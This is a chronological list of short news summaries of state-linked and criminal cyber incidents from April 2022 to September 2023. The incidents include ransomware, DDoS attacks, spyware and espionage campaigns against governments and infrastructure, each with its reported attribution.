September 2023: A Russian ransomware group leaked Australian federal police officers’ details on the dark web. The leak is the latest phase of a Russian attack which started in April 2023 against an Australian law firm that services several Australian government agencies.

September 2023: The iPhone of a Russian journalist for the independent newspaper Meduza was infected with Pegasus spyware in Germany this year. The incident is the first known instance of the spyware being used against a prominent Russian target. The country behind the spyware placement is unknown, but Latvia, Estonia, Azerbaijan, Kazakhstan, and Uzbekistan are all suspects given past use of Pegasus spyware or their allegiance to Russia.

September 2023: Suspected Chinese hackers attacked the national power grid of an unspecified Asian country earlier this year using Chinese malware. The group corrupted a Windows application that allowed them to move laterally within their target’s systems.

September 2023: A ransomware attack wiped four months of Sri Lankan government data. The country’s cloud services system didn’t have backup services available for the data from May 17 to August 26, according to reporting. Malicious actors targeted Sri Lanka’s government cloud system starting in August 2023 by sending infected links to government workers.

September 2023: An Indian cybersecurity firm uncovered plans from Pakistani and Indonesian hacking groups to disrupt the G20 summit in India. The hacktivists were expected to use DDoS attacks and mass defacements, which the firm’s research presumes to be the latest development in the hacktivist battle between these nations.

September 2023: Russian hackers stole thousands of documents from the British Ministry of Defense and uploaded them to the dark web. The documents contained accessibility details for a nuclear base in Scotland, high-security prisons, and other national security details. Hackers acquired the documents by breaking into a British fencing developer and gaining backdoor access to Ministry files.

September 2023: Russian cyber criminals accessed sensitive information from South Africa’s Department of Defense, including military contracts and personnel information. The Department reversed its previous statement denying the data leak.

August 2023: Russian hacktivists launched DDoS attacks against Czech banks and the Czech stock exchange. The hackers cut online banking access to the banks’ clients and demanded that the institutions stop supporting Ukraine. Bank representatives claim the hacks did not threaten their clients’ finances.

August 2023: Unnamed hackers took X, formerly known as Twitter, offline in several countries and demanded that owner Elon Musk open Starlink in Sudan. Attackers flooded the server with traffic to disable access for over 20,000 individuals in the U.S., UK, and other countries.

August 2023: Cybercriminals are allegedly selling a stolen dataset from China’s Ministry of State Security. The full data set purportedly includes personal identification information for roughly half a billion Chinese citizens and “classified document[s],” according to the criminals’ post about the sale.

August 2023: Russian hacktivists launched several DDoS attacks that knocked the Polish government’s website offline, as well as the Warsaw Stock Exchange and several Polish national banks.

August 2023: Russian hacktivists disabled Poland’s rail systems by gaining access to the system’s railway frequencies and transmitting a malicious signal that halted train operations. Attackers blasted Russia’s national anthem and a speech from Putin on Russia’s military operation in Ukraine during the attack.

August 2023: Chinese hackers targeted a U.S. military procurement system for reconnaissance, along with several Taiwan-based organizations. Attackers targeted high-bandwidth routers to exfiltrate data and establish covert proxy networks within target systems.

August 2023: Ukrainian hackers claim to have broken into the email of a senior Russian politician and leaked medical and financial documents, as well as messages that allegedly connect him to money laundering and sanctions evasion plots.

August 2023: Ecuador’s national election agency claimed that cyberattacks from India, Bangladesh, Pakistan, Russia, Ukraine, Indonesia and China caused difficulties for absentee voters attempting to vote online in the latest election. The agency didn’t elaborate on the nature of the attacks.

August 2023: Suspected North Korean hackers attempted to compromise a joint U.S.-South Korean military exercise on countering nuclear threats from North Korea. Hackers launched several spear phishing email attacks at the exercise’s war simulation center.

August 2023: Bangladesh shut down access to its central bank and election commission websites amid warnings of a planned cyberattack by an Indian hacking group. The shutdown was intended to prevent a cyberattack similar to a 2016 incident in Bangladesh where hackers stole nearly $1 billion, according to the central bank’s statement.

August 2023: Belarusian hackers targeted foreign embassies in the country for nearly a decade, according to new reporting. Hackers disguised malware as Windows updates to get diplomats to download it onto their devices.

August 2023: Chinese hackers obtained personal and political emails of a U.S. Congressman from Nebraska. The hackers exploited the same Microsoft vulnerability that gave them access to emails from the State Department and Department of Commerce.

August 2023: Iranian cyber spies are targeting dissidents in Germany, according to Germany’s domestic intelligence unit. The spies are using false digital personas tailored to victims to build a rapport with their targets before sending a malicious link to a credential harvesting page.

August 2023: Ukraine’s State Security Service (SBU) claims that Russia’s GRU is attempting to deploy custom malware against Starlink satellites to collect data on Ukrainian troop movements. SBU members discovered malware on Ukrainian tablets that were captured by the Russians before being recovered by Ukrainian forces.

August 2023: Russian hackers launched a ransomware attack against a Canadian government service provider, compromising the data of 1.4 million people in Alberta. The organization paid the ransom and claimed that very little data was lost.

August 2023: A Canadian politician was targeted by a Chinese disinformation campaign on WeChat. The attack included false accusations about the politician’s race and political views. The Canadian government believes the attacks are retaliation against the politician’s criticism of China’s human rights policies.

August 2023: The Canadian government accused a “highly sophisticated Chinese state-sponsored actor” of hacking a prominent Canadian federal scientific research agency.

August 2023: Russia’s military intelligence service attempted to hack Ukrainian Armed Forces’ combat information systems. Hackers targeted Android tablets that Ukrainian forces use for planning and orchestrating combat missions.

August 2023: The United Kingdom’s Electoral Commission revealed that Russian hackers breached the commission’s network beginning in August 2021. They obtained information on tens of thousands of British citizens by accessing the commission’s email and file-sharing system.

August 2023: According to a new report, North Korean hackers breached computer systems at a Russian missile developer for five months in 2022. Analysts could not determine what information may have been taken or viewed.

July 2023: China claims that an earthquake monitoring system in Wuhan was hacked by “U.S. cybercriminals.” Chinese state media asserts that a backdoor program with the capacity to steal seismic data was inserted into the program.

July 2023: Kenya’s eCitizen service was disrupted by pro-Russian cybercriminals for several days. Kenya’s Ministry of Information, Communications, and the Digital Economy claimed that no data was accessed or lost.

July 2023: Russian-linked hackers have targeted Ukrainian state services such as the app “Diia” using malware and phishing attacks. The primary targets are Ukrainian defense and security services.

July 2023: The Ministry of Justice in Trinidad and Tobago was hit with a DDoS attack that disrupted court operations across the country. The ministry reported outages beginning in late June, which are believed to be linked to this same attack.

July 2023: New Zealand’s parliament was hit by a cyberattack from a Russian hacking group. The group said their attack was retaliation against New Zealand’s support for Ukraine, such as its assistance with training Ukrainian troops and sanctions against Russia. Hackers temporarily shut down the New Zealand Parliament, Parliamentary Counsel Office (PCO) and Legislation websites in a DDoS attack.

July 2023: Russian hackers targeted twelve government ministries in Norway to gain access to sensitive information. The hackers exploited a vulnerability in a software platform used by the ministries.

July 2023: A South Korean government-affiliated institution fell victim to a phishing scandal that resulted in a loss of 175 million won, reportedly the first phishing incident against a South Korean government public organization.

July 2023: Chinese-linked hackers infected a Pakistani government app with malware. A state bank and telecoms provider were also targeted in the attack.

July 2023: Chinese hackers breached the emails of several prominent U.S. government employees in the State Department and Department of Commerce through a vulnerability in Microsoft’s email systems.

July 2023: Russian hackers targeted numerous attendees of the latest NATO Summit in Vilnius. The assailants used a malicious replica of the Ukraine World Congress website to target attendees.

July 2023: A Polish diplomat’s advertisement to purchase a used BMW was corrupted by Russian hackers and used to target Ukrainian diplomats. The hackers copied the flyer, embedded it with malicious software and distributed it to foreign diplomats in Kyiv.

June 2023: A group allegedly tied to the private military corporation Wagner hacked a Russian satellite telecommunications provider that services the Federal Security Service (FSB) and Russian military units. The attack comes after Wagner’s attempted rebellion against President Vladimir Putin over the war in Ukraine.

June 2023: A Pakistani-based hacker group infiltrated the Indian army and education sector in the group’s latest wave of attacks against Indian government institutions. The hack is the latest in a series of targeted attacks from this group that have intensified over the past year.

June 2023: Pro-Russian hacktivists attacked several European banking institutions, including the European Investment Bank, in retaliation against Europe’s continued support of Ukraine. The hacktivists used a DDoS attack to disrupt EIB.

June 2023: Several U.S. federal government agencies, including Department of Energy entities, were breached in a global cyberattack by Russian-linked hackers. Cybercriminals targeted a vulnerability in software that is widely used by the agencies, according to a US cybersecurity agent.

June 2023: An Illinois hospital became the first health care facility to publicly list a ransomware attack as a primary reason for closing. The attack, which occurred in 2021, permanently crippled the facility’s finances.

June 2023: Pro-Russian hackers targeted several Swiss government websites, including those for Parliament, the federal administration, and the Geneva airport. The DDoS attacks coincided with preparations for Ukrainian President Volodymyr Zelensky’s virtual address before the Swiss parliament.

June 2023: According to new reporting, North Korean hackers have been impersonating tech workers or employers to steal more than $3 billion since 2018. The money has reportedly been used to fund the country’s ballistic missiles program, according to U.S. officials.

June 2023: Ukrainian hackers claimed responsibility for an attack on a Russian telecom firm that provides critical infrastructure to the Russian banking system. The attack occurred in conjunction with Ukraine’s counteroffensive.

June 2023: Russia’s Federal Security Services (FSB) alleged that Apple worked closely with US intelligence agencies to hack thousands of iPhones belonging to Russian users and foreign diplomats. Apple denied the claims, and the NSA declined to comment.

May 2023: Belgium’s cyber security agency has linked China-sponsored hackers to a spear-phishing attack on a prominent politician. The attack comes as European governments are increasingly willing to challenge China over cyber offences.

May 2023: Chinese hackers breached communications networks at a U.S. outpost in Guam. The hackers used legitimate credentials, making it harder to detect them.

May 2023: Chinese hackers targeted Kenyan government ministries and state institutions, including the presidential office. The hacks appeared to be aimed at gaining information on debt owed to Beijing.

May 2023: A likely Russian state group has targeted government organizations in Central Asia. The group is using previously unknown malware, and the attacks focused on document exfiltration.

May 2023: An unidentified group hacked targets in both Russia and Ukraine. The motive for the attacks was surveillance and data gathering.

May 2023: Russian-linked hacktivists conducted an unsuccessful cyberattack against Ukraine’s system for managing border crossings by commercial trucks through a phishing campaign.

April 2023: Sudan-linked hackers conducted a DDoS attack on Israel’s Independence Day, taking the Israeli Supreme Court’s website offline for several hours. Israeli cyber authorities reported no lasting damage to network infrastructure. Hackers claimed to have also attacked several other Israeli government and media sites, but those attacks could not be confirmed. The group has been active since at least January 2023, attacking critical infrastructure in Northern Europe and is considered religiously motivated.

April 2023: NSA cyber authorities reported evidence of Russian ransomware and supply chain attacks against Ukraine and other European countries who have provided Ukraine with humanitarian aid during the war in Ukraine. There were no indications of these attacks against U.S. networks.

April 2023: Iranian state-linked hackers targeted critical infrastructure in the U.S. and other countries in a series of attacks using a previously unseen customized dropper malware. The hacking group has been active since at least 2014, conducting social engineering and espionage operations that support the Iranian government’s interests.

April 2023: Recorded Future released a report revealing data exfiltration attacks against South Korean research and academic institutions in January 2023. The report identified Chinese-language hackers. Researchers believe that this is a hacktivist group motivated by patriotism for China.

April 2023: Researchers at Mandiant attributed a software supply chain attack on 3CX Desktop App software to North Korea-linked hackers. During its investigation, Mandiant found that this attack used a vulnerability previously injected into 3CX software. This is Mandiant’s first discovery of a software supply chain attack leveraging vulnerabilities from a previous software supply chain attack.

April 2023: Chinese hackers targeted telecommunication services providers in Africa in an espionage campaign since at least November 2022. Researchers believe the group has targeted pro-domestic human rights and pro-democracy advocates, including nation-states, since at least 2014. Using the access from the telecom providers, the group gathers keystrokes and browser data, records audio, and captures data from individual targets on the network.

April 2023: A Russia-linked threat group launched a DDoS attack against Canadian Prime Minister Justin Trudeau, blocking access to his website for several hours. The operation’s timing coincided with the Canadian government’s meeting with Ukrainian Prime Minister Denys Shmyhal, suggesting that the operation was retaliation.

April 2023: North Korea-linked hackers are operating an ongoing espionage campaign targeting defense industry firms in Eastern Europe and Africa. Researchers at Kaspersky believe the hacking group shifted its focus in 2020 from financially motivated coin-mining attacks to espionage.

April 2023: Researchers discovered Israeli spyware on the iPhones of over 5 journalists, political opposition figures, and an NGO worker. Hackers initially compromised targets using malicious calendar invitations. The hackers’ origin and motivations are unclear.

April 2023: Ukraine-linked hacktivists targeted the email of Russian GRU Unit 26165’s leader, Lieutenant Colonel Sergey Alexandrovich, leaking his correspondence to a volunteer intelligence analysis group. The exfiltrated data contained Alexandrovich’s personal information, unit personnel files, and information on Russian cyberattack tools.

April 2023: North Korean-linked hackers targeted people with expertise on North Korea policy issues in a phishing campaign. Hackers posed as journalists requesting interviews from targets, inviting them to use embedded links for scheduling and stealing their login credentials. The amount of information stolen and number of targets are unclear.

March 2023: Russian hackers brought down the French National Assembly’s website for several hours using a DDoS attack. In a Telegram post, hackers cited the French government’s support for Ukraine as the reason for the attack.

March 2023: CISA and FBI reported that a U.S. federal agency was targeted by multiple attackers, including a Vietnamese espionage group, in a cyberespionage campaign between November 2022 and January 2023. Hackers used a vulnerability in the agency’s Microsoft Internet Information Services (IIS) server to install malware.

March 2023: A Chinese cyberespionage group ran a campaign lasting approximately a year against an East Asian data protection company that serves military and government entities.

March 2023: A South Asian hacking group targeted firms in China’s nuclear energy industry in an espionage campaign. Researchers believe the group commonly targets the energy and government sectors of Pakistan, China, Bangladesh, and Saudi Arabia.

March 2023: Estonian officials claim that hackers unsuccessfully targeted the country’s internet voting system during its recent parliamentary elections. Officials did not release details about the attacks or provide attribution.

March 2023: North Korean hackers targeted U.S.-based cybersecurity research firms in a phishing campaign. The campaign was meant to deliver malware for cyberespionage.

March 2023: A Chinese cyber espionage group targeted government entities in Vietnam, Thailand, and Indonesia, using newly developed malware optimized to evade detection.

March 2023: Russian hackers launched social engineering campaigns targeting U.S. and European politicians, businesspeople, and celebrities who have publicly denounced Vladimir Putin’s invasion of Ukraine. Hackers persuaded victims to participate in phone or video calls, giving misleading prompts to obtain pro-Putin or pro-Russian soundbites. They published these to discredit victims’ previous anti-Putin statements.

March 2023: Slovakian cybersecurity researchers discovered a new exploit from a Chinese espionage group targeting political organizations in Taiwan and Ukraine.

March 2023: Poland blamed Russian hackers for a DDoS attack on its official tax service website. Hackers blocked users’ access to the site for approximately an hour, but no data was leaked in the attack. A pro-Russian hacking group had earlier published a statement on Telegram about its intention to attack the Polish tax service.

February 2023: Russian hackers deployed malware to steal information from Ukrainian organizations in a phishing campaign. The malware is capable of extracting account information and files, as well as taking screenshots. Researchers believe the group is a key player in Russia’s cyber campaigns against Ukraine.

February 2023: A pro-Russian hacking group claimed responsibility for DDoS attacks against NATO networks used to transmit sensitive data. The attack disrupted communications between NATO and airplanes providing earthquake aid to a Turkish airbase. The attack also took NATO’s sites offline temporarily.

February 2023: Polish officials reported a disinformation campaign targeting the Polish public. Targets received anti-Ukrainian refugee disinformation via email. Officials claimed these activities may be related to Russia-linked hackers.

February 2023: A North Korean hacking group conducted an espionage campaign between August and November 2022. Hackers targeted medical research, healthcare, defense, energy, chemical engineering and a research university, exfiltrating over 100MB of data from each victim while remaining undetected. The group is linked to the North Korean government.

February 2023: Latvian officials claimed that Russian hackers launched a phishing campaign against its Ministry of Defense. The Latvian Ministry of Defense stated this operation was unsuccessful.

February 2023: Iranian hacktivists disrupted the state-run television broadcast of a speech by Iranian president Ebrahim Raisi during Revolution Day ceremonies. Hackers aired the slogan “Death to Khamenei” and encouraged citizens to join antigovernment protests.

February 2023: An Iranian hacking group launched an espionage campaign against organizations in the Middle East. Hackers used a backdoor malware to compromise target email accounts. Researchers claim the hacking group is linked to Iranian intelligence services.

February 2023: Iranian hacktivists claimed responsibility for taking down websites for the Bahrain international airport and state news agency.

February 2023: Hackers launched a ransomware attack against Technion University, Israel’s top technology education program. Hackers demanded 80 bitcoin ($1.7 million USD) to decrypt the university’s files. Israeli cybersecurity officials blamed Iranian state-sponsored hackers for the attack.

February 2023: Hackers disabled Italy’s Revenue Agency (Agenzia delle Entrate) website. While the website was disabled, users received phishing emails directing them to a false login page that mirrored the official agency site.

February 2023: Chinese cyberespionage hackers performed a spear-phishing campaign against government and public sector organizations in Asia and Europe. The emails used a draft EU Commission letter as their initial attack vector. These campaigns have occurred since at least 2019.

January 2023. Latvian officials claimed that Russia-linked hackers launched a cyber espionage phishing campaign against its Ministry of Defense. The Latvian Ministry of Defense stated this operation was unsuccessful.

January 2023. CISA, the NSA, and the Multi-State Information Sharing and Analysis Center released a joint advisory warning of an increase in hacks on the federal civilian executive branch utilizing remote access software. This follows an October 2022 report on a financially motivated phishing campaign against multiple U.S. federal civilian executive branch agencies.

January 2023. Russia-linked hackers deployed a ransomware attack against the UK postal service, the Royal Mail. The attack disrupted the systems used to track international mail.

January 2023. Iran-linked hackers executed ransomware attacks and exfiltrated data from U.S. public infrastructure and private Australian organizations. Australian authorities claim that the data exfiltrated was for use in extortion campaigns.

January 2023. Hackers used ransomware to encrypt 12 servers at Costa Rica’s Ministry of Public Works, knocking all its servers offline.

January 2023. Albanian officials reported that the country’s government servers were still near-daily targets of cyber-attacks following a major attack by Iran-linked hackers in 2022.

January 2023. Hackers launched a series of cyber-attacks against Malaysian national defense networks. Malaysian officials stated that the hacking activities were detected early enough to prevent any network compromise.

January 2023. Hackers targeted government, military, and civilian networks across the Asia Pacific leveraging malware to obtain confidential information. The malware targeted both the data on victim machines as well as audio captured by infected machines’ microphones.

January 2023. Hackers sent over a thousand emails containing malicious links to Moldovan government accounts.

December 2022. China-linked hackers launched phishing attacks against government, education, and research sector victims across the Asia Pacific. These attacks contained malware designed for espionage.

December 2022. Hackers launched email phishing attacks against Ukrainian government agencies and state railway systems. The emails included information on kamikaze drone identification and deployed malware designed for espionage onto victim machines.

December 2022. Hackers obtained contact information for more than 80,000 members of the FBI’s threat information sharing program, InfraGard. They then posted this information for sale on a cybercrime forum.

December 2022. Microsoft reported that it observed a pattern of attacks targeting Ukrainian critical infrastructure by the Russian hacking group Sandworm. These attacks were accompanied by pro-Russian propaganda.

December 2022. Human Rights Watch reported an ongoing, well-resourced cyber espionage, social engineering, and phishing campaign against human rights activists, journalists, diplomats, and politicians located across the Middle East. The organization attributed these operations to Iran-linked hackers.

December 2022. Hackers made Italy’s Ministry of Agriculture website unavailable through a DDoS attack. Italian officials described the attacks as “demonstrative” and claim that no data was breached and that they expect no lasting damage.

December 2022. Russia-linked hackers leveraged the networks of healthcare organizations, businesses, and critical infrastructure across the U.S., UK, France, and other countries to attack targets in Ukraine. Hackers’ primary motivations appear to be information stealing and disruption.

December 2022. Iran-linked hackers obtained and leaked data from government ministries in Saudi Arabia.

December 2022. Russia-linked hackers launched a DDoS attack against Vatican City servers, knocking its official website offline. The attack came three days after Russian government officials criticized Pope Francis for his comments about the war in Ukraine.

December 2022. Hackers launched a DDoS attack against the Danish defense ministry that disrupted access to its websites.

December 2022. Russia’s foreign minister claimed to be the target of coordinated cyber aggression by external intelligence agencies, IT companies, and hacktivists. According to Russian officials, such attacks have “doubled or tripled” over the past year.

December 2022. Chinese government-linked hackers stole at least $20 million in COVID-19 relief funds from the U.S. government, including Small Business Administration loans and unemployment insurance money. The U.S. Secret Service announced it had so far recovered half of the stolen funds.

December 2022. Chinese-linked hackers targeted Amnesty International of Canada in an apparent espionage operation.

December 2022. A U.S. lawmaker predicted spyware hacks of U.S. government employees could be in the hundreds, including diplomats in multiple countries. This follows a probe into how many U.S. government devices have been affected by spyware.

November 2022. Hackers disrupted operations at an Indian hospital by cutting off access to its online networks and patient records. It took hospital officials and federal authorities nearly two weeks to regain access to hospital servers and recover lost data.

November 2022. Microsoft and ESET attributed cyberattacks aimed at the energy sector and logistics industries in Ukraine and Poland to a Russian GRU hacking group. The campaign began in late September 2022.

November 2022. Hackers targeted Bahraini government websites with DDoS attacks prior to the country’s parliamentary and local elections.

November 2022. Iranian government-sponsored hackers compromised the U.S. Merit Systems Protection Board, exploiting the Log4Shell vulnerability as early as February 2022. After breaching the network, hackers installed cryptocurrency-mining software and deployed malware to obtain sensitive data.

November 2022. Hackers damaged Danish State Railways’ network after targeting an IT subcontractor’s software testing environment. The attack shut down train operations for several hours.

November 2022. An India-based hacking group targeted Pakistani politicians, generals and diplomats, deploying malware that gives the attacker access to computer cameras and microphones.

November 2022. State-sponsored hackers with possible ties to the Chinese government targeted multiple Asian countries in an espionage operation since March 2022, compromising a digital certificate authority in one country.

November 2022. Hackers disabled digital services of the Vanuatu government in a cyberattack. The attack affected all government services, disabling emails, websites, and government systems, with only partial access restored a month later. Australian sources stated the hack was a ransomware attack.

November 2022. Hackers targeted the Guadeloupe government, forcing the shutdown of all government computers to “protect data” during incident response and to determine the scope of the attack.

November 2022. Indian hackers targeted Pakistani government entities, including the military, and companies since April 2020. The attacks enabled hackers to infiltrate systems and access computer controls.

November 2022. Suspected Chinese-linked hackers carried out an espionage campaign on public and private organizations in the Philippines, Europe, and the United States since 2021. The attacks used infected USB drives to deliver malware to the organizations.

November 2022. Chinese state-affiliated actors increased attacks on smaller nations in Southeast Asia for cyberespionage purposes.

October 2022. Hackers targeted a communications platform in Australia, which handles Department of Defence data, in a ransomware attack. The government believes hackers breached sensitive government data in this attack.

October 2022. A Ukrainian newspaper published hacked data claiming to be sensitive information from Russian defense contractors. The hackers responsible are part of an anti-Putin group in Russia.

October 2022. Hackers targeted Bulgarian websites belonging to the presidential administration, the Defense Ministry, the Interior Ministry, the Justice Ministry, and the Constitutional Court in a DDoS attack. A pro-Russian hacking group claimed responsibility for the attack, stating it was punishment “for betrayal to Russia and the supply of weapons to Ukraine.”

October 2022. Hackers targeted several major U.S. airports with a DDoS attack, impacting their websites. A pro-Russian hacking group promoted the attack prior to its execution.

October 2022. Pro-Russian hackers claimed responsibility for an attack that knocked U.S. state government websites offline, including Colorado’s, Kentucky’s and Mississippi’s.

October 2022. CISA, the FBI, and NSA announced state-sponsored hacking groups had long-term access to a defense company since January 2021 and compromised sensitive company data.

September 2022. Iranian hackers targeted Albanian computer systems, forcing Albanian officials to temporarily shut down the Total Information Management System, a service used to track individuals entering and exiting Albania. This attack closely followed Albania’s decision to sever diplomatic ties with Iran as well as the American sanctions and NATO’s condemnation of an Iranian cyberattack against Albania in July. In the July attack, Iranian actors deployed ransomware on Albanian Government networks that destroyed data and disrupted government services.

September 2022. A newly discovered hacking group targeted telecommunications, internet service providers, and universities in the Middle East and Africa. The group deploys malware platforms directly into systems’ memory, bypassing native security solutions.

September 2022. Hackers targeted Montenegro’s government networks, rendering Montenegro’s main state websites and government information platforms inaccessible. Montenegrin officials blamed Russia for the attack.

September 2022. Hackers targeted the state-level parliamentary website of Bosnia and Herzegovina, rendering the sites and servers inaccessible for multiple weeks.

September 2022. China accused the U.S. National Security Agency (NSA) of numerous cyberattacks against China’s Northwestern Polytechnical University. Authorities claim the NSA stole user data and infiltrated digital communications networks.

September 2022. The group Anonymous took responsibility for a series of cyberattacks against the Iranian government that took down two main Iranian government websites and the websites of several state media organizations.

September 2022. Hackers targeted the Mexican Defense Ministry and accessed six terabytes of data, including internal communications, criminal data, and data that revealed Mexico’s monitoring of Ken Salazar, the U.S. Ambassador to Mexico. Mexican President Andres Manuel Lopez Obrador confirmed the authenticity of the data, including personal health data released to the public.

September 2022. A Russia-based hacking group targeted the website of the United Kingdom’s intelligence agency MI5 with a DDoS attack that temporarily took the site offline.

August 2022. Hackers breached Italy’s energy agency, Gestore dei Servizi Energetici (GSE), compromising servers, blocking access to systems, and suspending access to the GSE website for a week.

August 2022. Hackers used a DDoS attack to temporarily take down the website of Taiwan’s presidential office. The Taiwanese government attributed the attack to foreign hackers and stated normal operations of the website resumed after 20 minutes. Taiwan’s Foreign Ministry also noted hackers targeted their website and the main portal website for Taiwan’s government.

August 2022. Hackers targeted the Finnish Parliament with a DDoS attack that rendered the Parliamentary website inaccessible. A Russian group claimed responsibility for the attack on Telegram.

August 2022. Hackers targeted the website of Ukraine’s state energy agency responsible for the oversight of Ukraine’s nuclear power plants. The agency stated Russian hackers carried out the attack.

August 2022. Hackers targeted the website of the Latvian Parliament with a DDoS attack that temporarily paralyzed the website’s server. A Russian hacking group claimed responsibility for the attack on Telegram.

August 2022. Hackers targeted Greece’s largest natural gas distributor DESFA causing a system outage and data exposure.

August 2022. A Russian group claimed responsibility for breaching a privately owned UK water supply company South Staffordshire Water and leaking files in an extortion attempt.

August 2022. Hackers targeted Montenegro’s government institutions, breaching the computer systems of several state bodies. Montenegro’s Defense Minister stated there was sufficient evidence to suspect Russia was behind the attack.

August 2022. A DDoS campaign targeted the websites of both government and private Estonian institutions. Estonia stated that the attack was largely repelled, and the impact was limited.

August 2022. Hackers used phishing emails to deploy malware in government institutions and defense firms throughout Eastern Europe starting in January 2022. A report by the Russia-based company Kaspersky linked the campaign to a Chinese hacking group.

July 2022. Hackers targeted the Pakistan Air Force (PAF) in a spearphishing campaign to deploy malware and obtain sensitive files. Pakistani and Chinese organizations claimed the attack came from India-linked hackers.

July 2022. Hackers targeted Iran’s Islamic Culture and Communication Organization (ICCO). The attack took down at least 6 websites, placed images of Iranian resistance leaders on fifteen additional sites, wiped databases and computers, and allowed hackers to obtain access to sensitive ICCO data.

July 2022. A hacker claimed to acquire records on 1 billion Chinese from a Shanghai police database and posted the data for sale online.

July 2022. Belgium’s Foreign Ministry accused China of a cyberespionage campaign against Belgian targets, including Belgium’s Ministries of Interior and Defense. A spokesperson for the Chinese Embassy in Belgium denied the accusations.

July 2022. Hackers targeted social media accounts owned by the British Army. The attack included the takeover of the British Army’s Twitter and YouTube accounts.

July 2022. Hackers targeted Lithuania’s state-owned energy provider in a DDoS attack. Killnet, which Lithuanian officials link to Russia, claimed responsibility for the attack.

July 2022. Hackers temporarily took down websites belonging to the Albanian Prime Minister’s Office and the Parliament, and the e-Albania portal used to access public services.

July 2022. Hackers breached a Ukrainian media company to broadcast on multiple radio stations that Ukrainian President Volodymyr Zelenskyy was in critical condition. Zelenskyy refuted the claims and blamed Russia for the attack.

July 2022. China stated the United States stole 97 billion pieces of global internet data and 124 billion pieces of telephone data in June, specifically blaming the National Security Agency (NSA)’s Office of Tailored Access Operations (TAO).

June 2022. Hackers targeted Lithuania’s state railway, airports, media companies, and government ministries with DDoS attacks. A Russian-backed hacking group claimed responsibility for the attack.

June 2022. The FBI, National Security Agency (NSA) and CISA announced that Chinese state-sponsored hackers targeted and breached major telecommunications companies and network service providers since at least 2020.

June 2022. Hackers targeted former Israeli officials, military personnel, and a former U.S. Ambassador to Israel. An Israeli cybersecurity firm stated Iranian-linked actors used a phishing campaign to gain access to the targets’ inboxes, personally identifiable information, and identity documents.

June 2022. Hackers targeted three Iranian steel companies, forcing the country’s state-owned plant to halt production.

June 2022. Hackers leaked files and photos known as “The Xinjiang Police Files” displaying human rights abuses committed by the Chinese government against the Uyghur population.

June 2022. An attack targeted users of Australia’s largest Chinese-language platform, Media Today. The hackers made over 20 million attempts to reset user passwords in the platform’s registration system.

June 2022. Hackers targeted municipal public address systems in Jerusalem and Eilat, triggering the air raid siren systems throughout both cities. An Israeli industrial cybersecurity firm attributed the attack to Iran.

June 2022. A Chinese-linked disinformation campaign targeted an Australian mining company. The campaign included spreading disinformation on social media platforms and websites regarding the company’s alleged environmental record.

June 2022. A phishing campaign targeted U.S. organizations in military, software, supply chain, healthcare, and pharmaceutical sectors to compromise Microsoft Office 365 and Outlook accounts.

June 2022. Hackers compromised accounts belonging to officials in Germany’s Greens party, including ones used previously by Annalena Baerbock and Robert Habeck, who now serve as Minister for Foreign Affairs and Minister for Economic Affairs and Climate Action.

June 2022. Hackers targeted Norwegian public institutions with DDoS attacks, disrupting government websites. The Norwegian NSM security authority attributed the attack to pro-Russian hackers.

May 2022. A DDoS attack targeted the Port of London Authority, forcing its website to go offline. A group linked to Iran took responsibility for the hack.

May 2022. A phishing campaign targeted the Jordan Ministry of Foreign Affairs. Researchers attributed the attack to an Iranian cyber espionage actor.

May 2022. The Ethiopian Information Network Security Agency (INSA) stated hackers targeted the Grand Ethiopian Renaissance Dam (GERD). Ethiopia’s communications security agency thwarted the attacks before hackers could gain access to the networks.

May 2022. Hackers targeted Greenland’s healthcare system, causing networks to crash throughout the island. While an initial diagnosis determined the attack did not damage or expose citizens’ data, it made health services severely limited.

May 2022. A Chinese hacking group stole intellectual property assets from U.S and European companies since 2019 and went largely undetected. Researchers believe the group is backed by the Chinese government.

May 2022. State-sponsored hackers took down RuTube, the Russian version of YouTube, according to the company.

May 2022. Russian hackers hit Italian websites with a DDoS attack, including the Senate, the Ministry of Defence, and the National Health Institute. The group states its goal was to target NATO countries and Ukraine.

April 2022. The Romanian National Directorate of Cyber Security said that multiple public and private sector websites were hit with DDoS attacks. The victims included the ministry of defense, border police, national railway company, and the OTP Bank. A group claiming credit for the attack said on Telegram that it hacked the websites because Romania supported Ukraine since the Russian invasion of the country.

April 2022. Cybersecurity researchers identified a new campaign by Russian-linked hackers that started in January and targets diplomats and embassy officials from France, Poland, Portugal, and other countries. The hacks started with a phishing email to deliver a malware-laden file to the target.

April 2022. Iranian state television claimed that the government foiled cyber intrusions that targeted more than 100 public sector agencies. They provided no further information on the incident.

April 2022. Russian hackers targeted the Costa Rican Ministry of Finance in a cyberattack, crippling tax collection and export systems. The newly elected President of Costa Rica declared a national emergency as a result of the attack and the group asked for $20 million in ransom or it plans to leak the stolen data.

April 2022. Hackers targeted members of the European Commission with spyware developed by NSO Group. An Apple notification sent in November to thousands of iPhone users, stating they had been targeted by a state-sponsored actor, alerted the Commission to this spyware use.

April 2022. A North Korea-linked hacking campaign using phishing emails sent from fake job recruiters targeted chemical companies in South Korea.

April 2022. A Citizen Lab study discovered actors used NSO Group spyware to target at least 65 Catalonian activists and political figures.

April 2022. The U.S. Treasury Department’s Office of Foreign Assets Control attributed the March 29 hack of Ronin Network to a North Korean hacking group and announced sanctions against the hackers. The group stole over $540 million in Ethereum and USDC.

April 2022. Hackers launched DDoS attacks against websites belonging to the Finnish Ministries of Defence and Foreign Affairs. The attack’s botnet used over 350 IP addresses from around the world and the denial of service was sustained for four hours.

April 2022. Hackers targeted the Telegram accounts of Ukrainian government officials with a phishing attack in an attempt to gain access to the accounts.

April 2022. Cybersecurity researchers observed hackers penetrating the networks of at least 7 Indian State Load Dispatch Centres (SLDCs) which oversee operations for electrical grid control. The SLDCs manage SCADA systems and researchers suggested that PLA-linked hackers may be involved.

April 2022. A social media platform disrupted two Iranian-linked cyber espionage campaigns that targeted activists, academics, and private companies. The campaign targeted businesses in the energy, semiconductor, and telecom sectors in countries including the U.S., Israel, Russia, and Canada by using phishing and other social engineering techniques.

April 2022. A group targeted several Ukrainian media organizations in an attempt to gain long-term access to their networks and collect sensitive information, according to researchers. The group has connections to the Russian GRU.

April 2022. The United States removed Russian malware from computer networks around the world, a move made public by Attorney General Merrick B. Garland. While it is unclear what the malware’s intention was, authorities noted it could be used for anything from surveillance to destructive attacks. The malware created a botnet controlled by the Russian GRU.

April 2022. Hackers targeted a Ukrainian energy facility, but CERT-UA and private sector assistance largely thwarted attempts to shut down electrical substations in Ukraine. Researchers believe the attack came from the same group with ties to the Russian GRU that targeted Ukraine’s power grid in 2016, using an updated form of the same malware.

